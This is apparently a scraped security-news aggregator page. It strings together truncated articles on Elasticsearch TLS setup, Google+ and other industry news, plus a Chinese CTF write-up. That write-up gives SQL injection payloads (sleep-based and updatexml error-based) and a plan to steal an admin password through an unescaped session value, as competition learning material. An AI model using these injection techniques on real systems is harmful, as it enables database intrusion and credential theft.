Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

Elasticsearch Security: Configure TLS/SSL & PKI Authentication

$
0
0

When Elasticsearch security is enabled for a cluster that is running with a production license, the use of TLS/SSL for transport communications is obligatory and must be correctly setup. Additionally, once security has been enabled, all communications to an Elasticsearch cluster must be authenticated, including communications from Kibana and/or application servers.

The simplest way that Kibana and/or application servers can authenticate to an Elasticsearch cluster is by embedding a username and password in their configuration files or source code. However, in many organizations, it is forbidden to store usernames and passwords in such locations. In this case, one alternative is to use Public Key Infrastructure (PKI) (client certificates) for authenticating to an Elasticsearch cluster.

Configuring security along with TLS/SSL and PKI can seem daunting at first, and so this blog gives step-by-step instructions on how to: enable security; configure TLS/SSL; set passwords for built-in users; use PKI for authentication; and finally, how to authenticate Kibana to an Elasticsearch cluster using PKI.

Enabling security

In order to enable security it is necessary to have either a Gold or Platinum subscription , or a trial license enabled viaKibana orAPI. For example, the following command would enable a trial license via the API:

curl -X POST "localhost:9200/_xpack/license/start_trial?acknowledge=true"

Where localhost must be replaced with the name of a node in our Elasticsearch cluster.

After enabling a license, security can be enabled. We must modify the elasticsearch.yml file on each node in the cluster with the following line:

xpack.security.enabled: true

For a cluster that is running inproduction mode with a production license, once security is enabled, transport TLS/SSL must also be enabled. On the other hand, if we are running with a trial license, then transport TLS/SSL is not obligatory.

If we are running with a production license and we attempt to start the cluster with security enabled before we have enabled transport TLS/SSL, we will see the following error message:

Transport SSL must be enabled for setups with production licenses. Please set [xpack.security.transport.ssl.enabled] to [true] or disable security by setting [xpack.security.enabled] to [false]

Configuration of TLS/SSL is covered in the following sections.

TLS/SSL encryption

Elasticsearch has two levels of communications, transport communications and http communications. The transport protocol is used for internal communications between Elasticsearch nodes, and the http protocol is used for communications from clients to the Elasticsearch cluster. Securing these communications will be discussed in the following paragraphs.

Transport TLS/SSL encryption

The transport protocol is used for communication between nodes within an Elasticsearch cluster. Because each node in an Elasticsearch cluster is both a client and a server to other nodes in the cluster, all transport certificates must be both client and server certificates. If TLS/SSL certificates do not have Extended Key Usage defined, then they are already defacto client and server certificates. If transport certificates do have an Extended Key Usage section, which is often the case for CA-signed certificates used in corporate environments, then they must explicitly enable both clientAuth and serverAuth .

Elasticsearch comes with a utility called elasticsearch-certutil that can be used for generating self-signed certificates that can be used for encrypting internal communications within an Elasticsearch cluster.

The following commands can be used for generating certificates that can be used for transport communications, as described in this page on Encrypting Communications in Elasticsearch :

bin/elasticsearch-certutil ca ENTER ENTER bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12 ENTER ENTER ENTER

Once the above commands have been executed, we will have TLS/ SSL certificates that can be used for encrypting communications.

The newly created certificates should be copied into a sub-directory called certs located within the config directory. The certificates will then be specified in the elasticsearch.yml file as follows:

xpack.security.transport.ssl.enabled: true xpack.security.transport.ssl.verification_mode: certificate xpack.security.transport.ssl.keystore.path: certs/elastic-certificates.p12 xpack.security.transport.ssl.truststore.path: certs/elastic-certificates.p12

Now restart all of the nodes in our Elasticsearch cluster for the above changes to take effect.

Define built-in user’s passwords

We must now define passwords for the built-in users as described in Setting built-in user passwords . If we are running with a Gold or Platinum license, the previous steps to enable TLS/SSL for the transport communications must be executed before the cluster will start. Additionally, defining built-in user’s passwords should be completed before we enable TLS/SSL for http communications, as the command to set passwords will communicate with the cluster via unsecured http.

Built-in users passwords can be setup with the following command:

bin/elasticsearch-setup-passwords interactive

Be sure to remember the passwords that we have assigned for each of the built-in users. We will make use of the elastic superuser to help configure PKI authentication later in this blog.

Http TLS/SSL encryption

For http communications, the Elasticsearch nodes will only act as servers and therefore can use Server certificates ― i.e. http TLS/SSL certificates do not need to enable Client authentication.

In many cases, certificates for http communications would be signed by a corporate CA. It is worth noting that the certificates used for encrypting http communications can be totally independent from the certificates that are used for transport communications.

To reduce the number of steps in this blog, we’ll use the same certificates for http communications as we have already used for the transport communications. These are specified in the elasticsearch.yml file as follows:

xpack.security.http.ssl.enabled: true xpack.security.http.ssl.keystore.path: certs/elastic-certificates.p12 xpack.security.http.ssl.truststore.path: certs/elastic-certificates.p12 xpack.security.http.ssl.client_authentication: optional Enabling PKI authentication

As discussed in Configuring a PKI Realm , the following must be added to the elasticsearch.yml file to allow PKI authentication.

xpack.security.authc.realms.pki1.type: pki Combined changes to elasticsearch.yml Once the above steps have been followed, we should have the

Real-Time Incident Response and Forensics Capabilities Debut in Twistlock 2.5

$
0
0

The big names in the container world such as Docker, Google, and Red Hat have all been ratcheting up the security of their container offerings over the last year or two. And that means there's less and less room for independent container security companies who hope to offer best-of-breed solutions. There's a serious danger many of them will be choked off before they can really thrive.

But one company that is still going head to head with the big boys is Twistlock, the San Francisco-based company named after a piece of equipment used to secure shipping containers. Twistlock came out of stealth mode and launched itself onto the container security scene back in 2015.
Real-Time Incident Response and Forensics Capabilities Debut in Twistlock 2.5

Since then the company had raised $30M up until August 15 2018, when it announced another $33 million in a series C round of funding. During that period it grew its customer base by over 350% each year, nabbing 25% of Fortune 100 companies as customers.

To stay in the game Twistlock has released a series of updates to its original product. This let container users monitor static container images and runtime container applications to identify risks as well as specify security baselines to ensure a container host had been hardened and containerized applications met certain quality and security standards.

Twistlock 2.5 Introduces Automated Forensic Data Collection and Correlation

The latest version of its platform, Twistlock 2.5, adds real time incident response and forensics capabilities to the offering. This provides automated forensic data collection and correlation across cloud native environments of any size, all with no additional resource overhead according to company claims.

It minimizes network overhead by automatically maintaining a spool of process and network activity on each node in a container environment, collating and correlating this data in the Twistlock Console only if and when an incident is detected.

This approach, says John Morello, Twistlock's chief technology officer, offers greater visibility into the state of applications prior to compromise than afforded by traditional forensic solutions without affecting performance.

"As more of our customers scale out their cloud-native environments, they're finding that traditional forensic solutions don't keep up ― they're not built for microservices, and the resource load needed to effectively collect and surface data slows down the production environment.

"With the new forensic capabilities in Twistlock 2.5, we're providing a fully cloud-native approach that captures and stores forensic data pre-attack in a lightweight, decentralized fashion that can scale with even the most complex environment ― yet still surface actionable signals in real time."

An Added Bonus for Amazon Fargate Customers

There's an added bonus here for customers who use Amazon's Fargate container hosting platform. These users can now make use of Twistlock's centralized policy creation and automated enforcement features with Fargate applications without the need for any manual configuration ― unlike existing Fargate security solutions. Twistlock 2.5 allows security teams to automatically enforce security policy in Fargate applications from the same central console used to protect the rest of the cloud native environment.

One further feature worth mentioning in Twistlock 2.5 is the general availability of the runtime defense for severless functions that the company first unveiled in June. With this release, teams building applications to run in AWS Lambda or other serverless environments can now protect their functions from attack with the same automated policy deployment and centralized console used to protect the rest of their cloud native stack.

Additional New Features in Recent Twistlock Releases

The 2.5 release of Twistlock is the just the latest of a series of updates to the Twistlock platform since Version 2.0 was unveiled in April 2017.

Version 2.0 introduced a feature called Runtime Radar 2.0, which helps visualize how containers interact with each other and provides a single view into the status, connectivity, and risk state of an organization's container environment.

It also introduced Compliance Explorer, a feature that relies on predictive analytics to monitor an organization's current compliance state. It creates a dashboard displaying how compliant a company is at any given point in time, listing out those entities that are non-compliant.

Later the company added a Cloud Native App Firewall, or CNAF, and a Vulnerability Explorer, which gives users a stack-ranked view of the most critical risks in their environment, based on the organization's deployments.

Paul Rubens is a technology journalist and contributor to ServerWatch, EnterpriseNetworkingPlanet and EnterpriseMobileToday. He has also covered technology for international newspapers and magazines including The Economist and The Financial Times since 1991.

Follow ServerWatch on Twitter and on Facebook

Blockchain Identity Management | Data Security 2.0?

$
0
0

Blockchain identity management may be the next step in the evolution of data security. Despite their promises, big name brands may not be as safe as we thought they were.Equifax, Yahoo, or Uber? Take your pick. Data breaches have hit all of these companies in recent years, and the relentless pace of hacks doesn’t seem to be letting up.

According to the breach level index , only four percent of breaches since 2013 were rendered useless due to encryption. This is a pretty remarkable statistic when you consider that cryptography has been around for more than 50 years. The public is becoming noticeably worried, but what can these big names do about this trend? And, will blockchain identity management help?

Cryptography Baked In

Bitcoin has been providing a real-world case in secure data communications since 2009. Add to that the fact that its technology is open-source, and you really have to wonder why big companies aren’t implementing their own crypto security solutions. As far as we know, no one has ever hacked the Bitcoin blockchain. Anybody who hasn’t yet should probably be taking a long hard look at what blockchain can offer them.

In simple terms, Bitcoin uses public/private key cryptography , which allows sensitive information to be passed securely over a network. The beauty of Bitcoin is that the security is part of the network from the get-go. Contrast this with many companies who are attempting to bolt on security to their already aging networks.

A number of other cryptocurrency projects and blockchain startups are extending these core principles to allow users to effectively manage their identity on the blockchain. Major problems require major solutions. Those that provide the best blockchain identity management solution will most likely have huge revenues as this industry matures.

Where Current Systems Fail Centralization

Corporations like IBM have already identified this potential and are racing to be the leader in permissioned blockchain solutions. Some have argued, however, that private blockchains aren’t really viable . Regardless of where you stand, it’s helpful to figure out how we got here.

The first major flaw that current identity management systems suffer from is centralization . The internet was originally designed as a peer-to-peer network. For the first time in history, this network allowed for the free flow of information without censorship and across borders. Those who owned the medium no longer controlled the message.


Blockchain Identity Management | Data Security 2.0?

Identity management will ideally follow the peer-to-peer internet model.

Unfortunately, private entities have since captured much of the internet: Google with internet search, Facebook with social media, ICANN with domain name registries, Amazon in e-commerce and so on. You get the picture. These (and many other) companies stockpile massive amounts of personal data making them attractive targets. This stockpiling creates the so-called honeypot effect. Hackers are far more likely to break into these systems than to target individual users.

Censorship

The second issue that this creates is the increased possibility of abusing your position of power. Major tech giants already have areputation for censoring content based on political and ideological views. This poses a real threat to freedom of speech and authentic self-expression, which many describe as the hallmarks of prosperous societies.

Keep in mind that many online applications require you to register with one of these companies either via their email or social profile. If they ever delete your accounts or censor them, for whatever reason, where does that leave you? A virtual nomad who doesn’t exist.

Blockchain Identity Management

The creators of the internet failed to see the need for good identity management when they were building out the very first protocols. They couldn’t have known that at the time, of course. Unfortunately, the result is the huge-scale privatization of our data. Tech companies have capitalized on the opportunity to own as much of our data they can get their hands on. As they say, if it’s free, chances are, you are the product! These companies have many excellent free products. They have to pay for them somehow.

That’s the fundamental change that blockchain is bringing to identity management. Centrally hosted data servers (including cloud-based solutions ) are costly to maintain, and many will be eliminated when users can manage their own identity with blockchain technology. There are a number of projects looking to be the leader in this area. The competition is tough and predicting the best approach is a difficult challenge.

Some projects like Civic promote blockchain identity management via their app. Others like Blockstack provide a browser-based solution to interact with decentralized applications. Another interesting feature they develop is a peer-to-peer domain name service (DNS) built directly on the blockchain. You are no longer at the mercy of a single organization, like ICANN, when hosting your favorite or controversial content.

Final Thoughts

It’s tough to figure out which approach will be best. There are many factors to consider when building out the future of identity management: language, culture, access to technology, and so on. Viewing it from a global perspective will help. We aren’t yet at a point where everyone in the world has access to their own smartphone. The success of the internet today is largely thanks to simple technologies like HTTP and TCP protocols, which abstract a lot of the technical details away from us so we can just get on with the business of “internetting.”

Connecting emerging blockchain protocols to existing internet protocols seems like the logical choice. There are companies riding the blockchain bandwagon who plan to be the next generation of power centers. The chances are high that they will fail.In the not too distant future, we will become aware of all the choices being built for us today. Consumers are waking up to the fact that data hosted elsewhere is not particularly safe. Finally, we will be able to take control of own online identity.

The post Blockchain Identity Management | Data Security 2.0? appeared first on CoinCentral .

Are there any known standards or security flaws in password-protected ZIP files ...

$
0
0

Just like the title says. I was hoping someone could direct me to documents/resources that show how to encrypt a zip file such that most (if not all) 3rd-party apps can open it.

I'm more interested in the security aspect rather than how to do it - any knowledge is welcome.

This is to casually protect files on my work computer (and network drive) from prying co-workers.

There aren't any big flaws in ZIPs password. There are tools that can crack a zip file password but they have to do it using brute force, usually starting with a dictionary attack. For protecting files locally or on a network, it should be fine as long as you pick a long enough password. I'd suggest using a phrase like 'givemelibertyorgivemedeath' or whatever. Long enough to make brute force attacks unfeasible but short enough to keep from being a pain to type everything you need to unlock a file.

Escrow launches in Australia

$
0
0

Global secure payments system Escrow.com has launched in Australia with the introduction of Australian Dollar capability for online escrow payments.

Escrow.com says its platform can be used for secure transactions involving any item of value, including domain names, vehicles, machinery, aircraft, space station hotel deposits “or anything that a business or an individual might want to buy or sell safely online”.

According to Escrow it has safely processed over US$3.5 billion in transactions with its secure service, and acts as a trusted third-party that collects, holds and only disburses funds when both a buyer and a seller are satisfied with a transaction.

The company pitches its service as ideal for transaction sizes from $100 to $10,000,000 or more.

“Now, for the first time, merchants and online marketplaces in Australia have the ability to tap into the security and power of Escrow.com, ensuring safe transactions for buyers and no chargebacks, ever, for sellers,” the company says in its announcement of entry into the Australian market.

“Escrow.com has already made a name for itself in other markets, delivering unprecedented safety and security for online transactions, thanks to the escrow process, which sees funds kept in trust until all involved parties are satisfied with the deal,” said Escrow.com General Manager Jackson Elsegood.

“With the launch of Australian Dollar capability, buyers and sellers in Australia can now make the most of what this escrow process has to offer.”

Escrow.com’s Australian dollar launch comes just weeks after the launch of Escrow Offer, promoted as the “easiest way to introduce the power of price negotiation into online platforms”. This followed the release of Escrow Pay, which lets businesses integrate the protection provided by the Escrow.com API directly into their websites, mobile apps and online marketplaces.

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

Google+ to shut down early after second major security incident

$
0
0

After another data leak, its second such leak in a year, Google today announced it was shutting down its beleaguered social media platform, Google+. API access will shut down even sooner, within the next 90 days.

The newest vulnerability affected 52.5 million users, according to Google. Profile information, including names, email addresses, age, and occupation were all exposed. Worse, accounts set to private were still affected. Apps may have also stolen data stolen with specific Google+ users, but not publicly.

Do you like good gadgets?

Those sweet cool gadgets?

Oh, yeah

“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs; this will occur within the next 90 days,” says David Thacker, VP of project management at Google, in a blog post . “In addition, we have also decided to accelerate the sunsetting of consumer Google+ from August 2019 to April 2019.”

Thacker says Google discovered the bug as part of its standard testing procedure, stating that there is “no evidence” that developers who had access to this data were aware of it, or had misused it.

Google has already begun notifying users affected by the bug.

In October, a similar Google+ vulnerability may have exposed data to app developers for as long as three years. The bug was discovered in March, but not publicly disclosed until October.

This leak, Thacker says, was discovered on its own, and live for just six days.

Expediting changes to Google+ on Google Blog

快讯 | “黑客教父”原是无业男,涉嫌非法利用信息网络罪被刑拘

$
0
0

“马云一个亿聘请被拒绝”“中国最年轻黑客教父”,这一个个响亮的称号被放在了一名无业的青年男子郭某身上。他通过网上虚拟自己的身份信息,录制黑客视频,吸引粉丝充值牟利。昨天,北京晨报记者独家从北京市公安局网络安全保卫总队(以下简称网安总队)通报,在公安部“净网2018”专项行动中,成功打掉“东方联盟”黑客网站,并将在网上自吹自擂的“黑客教父”郭某抓获。目前,郭某因涉嫌非法利用信息网络罪被海淀分局刑事拘留。


快讯 | “黑客教父”原是无业男,涉嫌非法利用信息网络罪被刑拘
“黑客教父”网售黑客教程软件

今年10月,网安总队会同海淀分局网安部门在网上巡查中发现,有多篇网帖大肆宣扬鼓吹“黑客教父”郭某,网帖内容煽动性、诱导性强,在互联网黑客圈影响力极大。在帖子中将郭某化作“中国黑客”的领袖,帖子中还称“马云一个亿聘请被拒”。“郭某,曾被公认为是世界上最有天赋的黑客教父之一,他16岁就创办华盟(现东方联盟),作为一个经常出现在黑客和软件会议的人物,他现在除了有属于自己的网络公司,还担任多家公司的高级安全顾问,创办了中国人数最多黑客安全联盟。”不仅如此,帖子中还称“郭某创造了著名的黑客集团‘东方联盟’,很快他就把这个小组织的骨干成员扩大到十多个,2007年,郭某宣布成立华盟,并已成为中国当时最大的黑客组织之一。”

民警发现,网帖中除鼓吹“郭某”个人外,还多次提到了其开办了黑客网站“东方联盟”。民警很快对该网站展开调查,经分析发现,“东方联盟”实为一黑客网站,该网站以收取会员费的方式大肆传播黑客工具、分享黑客技术,其中还包括郭某录制的以“一对一授课”的模式教授黑客犯罪方法。

北京警方跨省抓捕假教父落网

民警通过进一步核查和工作,发现网站“东方联盟”的实际经营者为在广东佛山生活的郭某(男,28岁,广东肇庆人)。他独自一人在网上发布鼓吹自己的网帖,制造“黑客教父”的假象。通过给自己造势,吸引粉丝,借机出售会员和软件获利。至于其他成员,都是郭某杜撰出来的。调查还发现,所谓马云亿元聘请、多家公司高级安全顾问、16岁创建庞大黑客组织等种种经历均属编造。

在案情基本清晰后,警方很快锁定嫌疑人。抓捕前,民警从北京赶到了广州,一方面做好前期的证据固定,另一方面制定抓捕方案。11月1日14时,在广东省佛山市禅城区将黑客网站“东方联盟”的经营者郭某抓获。面对民警,该人对其开设黑客网站、传播黑客工具并进行黑客教学的行为供认不讳。民警了解到,郭某在中专毕业后,没有固定工作,靠打散工为生。他通过自吹自擂,吸引粉丝,收纳会员。

郭某供述,他在2015年建立了该网站。用户花费899元购买终身会员或者花费750元购买一年会员资格后,郭某便将用户拉进微信和QQ群,在群里沟通交流。此外,他在网站上也发布黑客工具类软件,一般放在网站的“视频教程”板块,只有会员能下载。目前,他的微信群内有会员近300人,QQ群内有会员400余人。

目前,郭某因涉嫌非法利用信息网络罪被海淀分局刑事拘留。

*本文来自 北京晨报 ,转载请注明原出处

Google Cloud Platform now IRAP-certified by Australian Cyber Security Center

$
0
0

As more organizations in Australia seek to take advantage of cloud computing, Google Cloud has continued to expand our capabilities in the region. We opened our Sydney region in July 2017, and continue to expand our list of available services there. For current and potential cloud adopters, particularly those in the public sector and other regulated industries, security and compliance remains a top priority.

To meet the security needs of customers in the region, we’re happy to announce that Google Cloud Platform (GCP) has achieved Information Security Registered Assessors Program (IRAP) certification for a subset of services by the Australian Cyber Security Center, a part of the Australian Signals Directorate (ASD). Attaining IRAP certification confirms that GCP’s physical, personnel and information security controls meet the requirements prescribed by the ASD.

As a part of this certification, Google Cloud Platform has been added to the ASD’s Certified Cloud Services List (CCSL). Inclusion on the list opens the door for Australian federal, state, and local government agencies to store data and run workloads on GCP. IRAP certification also provides a path for GCP customers to work with the Australian government, and provides validation for private sector organizations that their data will be protected and handled in accordance with the Australian Cyber Security Center’s rigorous standards.

For more information on our IRAP certification, other certifications Google Cloud has achieved, and the global regulations we help customers address, visit the Google Cloud compliance site .


湖南第二届大学生网络安全技能竞赛web解题记录

$
0
0

湖南第二届大学生网络安全技能竞赛web解题记录
0x1前言

有幸去苟了一次湖南的第二届大学生网络安全技能竞赛,除了坐大巴去湘潭大学比较累,比赛环节的待遇还是很好哒(ps.比赛现场有好多湘大漂亮的小姐姐,辛苦哒),感谢主办方精心准备的一次比赛。

回到比赛上来,这次我这个web dog真的太失败了,两道web最终没人A掉,这里我分享下当时自己的做题思路,加上赛后的复现记录。

0x2web 200 (一)解题记录

做题首先走一遍题目的流程:

上传 csv => next step=> 保存csv内容到数据库=>insert过程产生注入点

csv的格式很简单:


湖南第二届大学生网络安全技能竞赛web解题记录

在http协议里面数据就是 主要看双引号代表一个字段最优先,然后逗号分隔代表一个列

当时我通过csv的保存格式 (4,'["123","123","123","123"]','2018-12-08 12:37:24')

猜到了是insert类型的二次注入,这里会有个过滤

‘=> \‘ 导致了单引号可以逃逸,第二行第一个字段输入

123\' or sleep(5),123)# => (4,'["123\',123)#","123","123","123"]','2018-12-08 12:37:24') 这样也就变成了 (4,'["123\' or sleep(5),123) 这样理论来说就逃逸出来了

但是当时比赛的时候我本地进行测试的时候一直爆

ERROR 1292 (22007): Truncated incorrect INTEGER value:

当时我也这样带入了payload然后发现save之后也没延时,就开始怀疑自己的想法了,

当时又因为这道题没人解决出来,想着自己那么菜b应该做不出来,然后放弃了。。emm(心态爆炸那种)

最后1小时主办方给了 hint:二次注入

但是我此时已经深陷在web500中不能自拔了。

(二)赛后分析

首先说下我当时测试的时候插入错误的原因:

select @@version;

+-----------+
| @@version |
+-----------+
| 5.7.21 |
+-----------+
1 row in set (0.00 sec)

show variables like "sql_mode";

STRICT_TRANS_TABLES //严格模式

mysql 5.7.17 默认开启严格模式

有关严格模式可以可以参考下文章 MySQL sql_mode 说明(及处理一起 sql_mode 引发的问题)

作用:

STRICT_TRANS_TABLES

设置它,表示启用严格模式。

注意 STRICT_TRANS_TABLES 不是几种策略的组合,单独指 INSERT 、 UPDATE 出现少值或无效值该如何处理:

1.前面提到的把 ‘’ 传给int,严格模式下非法,若启用非严格模式则变成0,产生一个warning

2.Out Of Range,变成插入最大边界值

3.A value is missing when a new row to be inserted does not contain a value for a non-NULL column

经过我的测试发现了一些小特性:

我在低于mysql 5.7.17 的 5.6.35 测试发现:

insert into user(`user`,`pass`) values('123"'^(sleep(5)),'123')

这样是可以进行插入的,而且会忽略特殊符号,提示 warning 错误

如果是高版本下的严格模式存在特殊符号是error类型错误导致没办法进行运算,这样时间盲注就失效了

但是有趣的是

mysql> insert into test(`name`,`password`) values('"' or updatexml(1,concat(0x7e,(select user())),0),'123');
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

如果存在报错,那么在严格模式也是可以进行报错的,这个tips可以注意下。

之前看p神的一篇文章说到连接符导致insert出错的问题,用比较运算符来解决问题,我感觉还是有些问题的,

这个还需要去深入研究下。

最后,由于当时我没去测试题目的mysql版本也不知道具体是什么情况,也有可能是我做题的方向就已经出错了,

可能是另外的注入点,欢迎大佬找我交流下。

0x3 web500

这道题是我比赛花了很长时间,最终没解出来,感觉特别遗憾的一道题,也让我反思了自己很多问题,比赛

的经验实在是匮乏,导致拖拖拉拉,卡这卡哪,最终,拖了队友的后腿,与第一名差了15分,丢失了第一。

(一)解题记录

当时查看题目页面源代码发现注释提示了

<!--www.zip -->

下载后是两个文件: index.php valicode.php

index.php 是主要的题目文件

valicode.php 是生成验证码的文件

由于代码比较长这里只分析漏洞点的代码

想要源代码我会放上我的githud ctf_web解题记录

结合代码分析下流程:

程序功能(1-68 line):

function register($user, $pass)
function login($user, $pass)
function listnote($user)
function getnote($id, $user)
function savenote($id, $user, $title, $content)
function newnote($user, $title, $content)
function delnote($id, $user) 解题流程:

通过阅读代码发现有一处备份功能可以上传shell 但是需要admin权限,通过sql注入去获取admin权限

正向流程就是:

sql注入->获取admin密码->备份上传getshell->获取flag 漏洞点1 SQL盲注 function register($user, $pass) {
global $conn;
$user = '0x' . bin2hex($user);
$pass = '0x' . bin2hex($pass);
$result = $conn->query("select * from user where user=$user");
$data = $result->fetch_assoc();
if ($data) return false;
return $conn->query("insert into user (user,pass) values ($user,$pass)");
}
function login($user, $pass) {
global $conn;
$user = '0x' . bin2hex($user);
$result = $conn->query("select * from user where user=$user");
$data = $result->fetch_assoc();
if (!$data) return false;
if ($data['pass'] === $pass) return true;
return false;
}

前几行代码可以看出来进入sql语句的变量都做了hex编码处理

这样除了二次注入是没办法注入

结合题目的描述: 很多漏洞都是粗心引起的

然后耐心的看完了所有功能点的代码,最终发现在

function delnote($id, $user) {
global $conn;
$id = (int)$id;
$result = $conn->query("delete from note where id=$id and user='$user'");
return $result;
}

$user 没有进行hex编码拼接进了sql语句,那么回溯下看下传参过程

case 'delete':
if (!$user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=login");
}
$id = (int)$_GET['id'];
var_dump($id);
delnote($id, $user); //调用delnote
header("HTTP/1.1 302 Found");
header("Location: ?action=home");

继续回溯

//69-73
$user = $_SESSION['user'];
$action = $_GET['action'];
$admin = $user === 'admin';
// $conn = mysqli_connect(DB_HOST,DB_USER,DB_PASS,DB_DATABASE) or die("connect to mysql error!");
$conn->query("set names 'utf8'"); $user 是由 $_SESSION['user'] 决定的 继续寻找下 $_SESSION['user'] 赋值 switch ($action) {
case 'login':
if ($user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
elseif (isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['code'])) {
if ($_POST['code'] != $_SESSION['answer']) echo '<div class="alert alert-danger">Math Test Failed</div>';
elseif ($_POST['user'] == '') echo '<div class="alert alert-danger">Username Required</div>';
elseif ($_POST['pass'] == '') echo '<div class="alert alert-danger">Password Required</div>';
elseif (!login((string)$_POST['user'], (string)$_POST['pass'])) echo '<div class="alert alert-danger">Incorrect</div>';
else {
$_SESSION['user'] = $_POST['user']; //here
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
$_SESSION['answer'] = rand();
}
?> $_SESSION['user'] = $_POST['user']; 可以看到在登陆成功后把post的user值直接设置给了session

那么思路就来了

通过注册一个注入的语句的用户然后去执行delnote功能,虽然输出报错信息,但是可以通过时间盲注来注入出admin的密码

但是分析流程要注意以下几个问题:

注册是否有限制:

case 'register':
if ($user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
elseif (isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['code'])) {
if ($_POST['code'] != $_SESSION['answer']) echo '<div class="alert alert-danger">Math Test Failed</div>';
elseif ($_POST['user'] == '') echo '<div class="alert alert-danger">Username Required</div>';
elseif ($_POST['pass'] == '') echo '<div class="alert alert-danger">Password Required</div>';
elseif (!register((string)$_POST['user'], (string)$_POST['pass'])) echo '<div class="alert alert-danger">User Already Exists</div>';
else echo '<div class="alert alert-success">OK</div>';
$_SESSION['answer'] = rand();
} $_

Most UK retailers plan to up cyber security

$
0
0

Retailers plan to increase cyber security measures during the holiday season, according to a poll of IT professionals in the sector in the UK, Germany, Belgium, the Netherlands, Luxembourg and the US.

Some 63% of UK and 62% of German retailers claimed to increase cyber security measures during the holiday season, according to the survey, commissioned by IT automation and security firm Infoblox.

The main reason cited for the increase by one-third of respondents in these countries was a seasonal rise in social engineering attacks, which were also identified as a dominant concern for 25% of IT professionals in the Netherlands’ retail sector.

Other kinds of attack cited were social media scams, distributed denial of service (DDoS) and ransomware .

Social media scams were of most concern in the US (19%), followed by the UK (15%), the Netherlands (14%) and Germany (12%).

DDoS attacks were of greatest concern in the Netherlands (20%), followed by Germany (17%), the UK (12%) and the US (7%).

Ransomware was of greatest concern in the US (12%), followed by Germany (11%), the UK (10%) and the Netherlands (9%).

The research found that among the main threats posed to networks within the UK were unpatched security vulnerabilities (28%), online consumers themselves (25%) and internet-connected devices (21%).

Within the UK, artificial intelligence (43%) was cited as the technology most likely to be implemented within the next year, followed by internet-connected devices (35%), portable media technology (24%), omni-channel technology (23%) and augmented reality (17%).

The majority of IT decision-makers in the UK (55%) said they were concerned about new technologies, in stark contrast to those in the Netherlands, where only 20% claimed to be concerned.

The survey also polled consumers on their experiences and attitudes towards online data privacy and security while shopping online.

Although most global consumers shop online to some degree, 17% do nothing to protect their data while doing so. The UK is the most complacent, with just one in five taking no proactive action to protect their data. German consumers are more cautious when shopping online, with more than half (53%) shopping only on secured Wi-Fi networks.

“The level of online shopping activity always increases significantly during the holiday season, and can provide rich pickings for the opportunistic cyber criminal, so it’s no coincidence that more than half of retailers will increase their cyber security spending during their most prosperous and dangerous time of year,” said Gary Cox, technology director, western Europe at Infoblox.

“It is critical that enterprises take measures to get additional network visibility, so they can respond quickly to potential cyber incidents which could result in lost revenue and brand damage.”

IT professionals in the UK named unpatched security vulnerabilities as the main source of an attack (28%), followed by consumer/end-user error (25%), vulnerabilities in the supply chain (22%), and unprotected internet-connected devices (21%).

When holiday shopping, delivery is the biggest point of concern for UK consumers (55%), followed by ID fraud (16%), data security (13%) and website crashing (13%).

Just 48% of UK consumers said they were only “somewhat” or “not at all” aware of the data being collected through store loyalty cards, while only 34% claimed to trust retailers to hold their personal data.

“It is interesting that so few consumers around the world are actively concerned with the protection of their own data when shopping online, particularly when two-thirds of those we surveyed had little trust in how retailers held that data,” said Cox.

“More education is clearly required about the risks that online shoppers face, especially over Christmas, and the steps they can take to better protect their own data and identity from those intent on theft and fraud.”

Expermenting with AWS's new a1 instances with awless

$
0
0

There is a time and place for repeatable infrastructure builds. I wouldn’t want anything to get to production without being terraformed/cloudformationed/etc.

However, there’s also a time and place for tinkering, experimenting, “hacking around”, and for that, “infrastructure as code” is often overkill.

Many times, the AWS console is a great place to start pointing and clicking your way to victory. That gets annoying, quickly, though, if you’re doing a bunch of things that are similar but not identical; and it can also take a lot of clicks to discover information you need. The command line is an excellent middle ground.

Quick discoverability; typing CLI commands can be a lot faster than traveling through several console screens and picking the right rows from dropdowns. Easy to copy/tweak/paste for light repeatability.

AWS’s own CLI is pretty solid, and they are working on a v2 version to improve usability. But there’s already a usability-focused AWS CLI tool available: awless .

The Goal: Experiment with a1 instances

AWS just announced an ARM-based computing platform: Graviton.

You can read about them in an AWS Blog Post or on the site of the always impressive James Hamilton .

I’ve personally been watching ARM in the datacenter for a long time. In the web hosting world it seemed very interesting having more / cheaper / lower power CPUs could be a nice way to provide a better quality of service per customer in spite of ‘noisy neighbors’, and the investment in ARM for mobile meant the effective compute power per watt was increasing rapidly as the desire for mobile power exploded. I also have used linux on ARM quite a bit with the Raspberry Pi. So, when they were announced, I was curious to play!

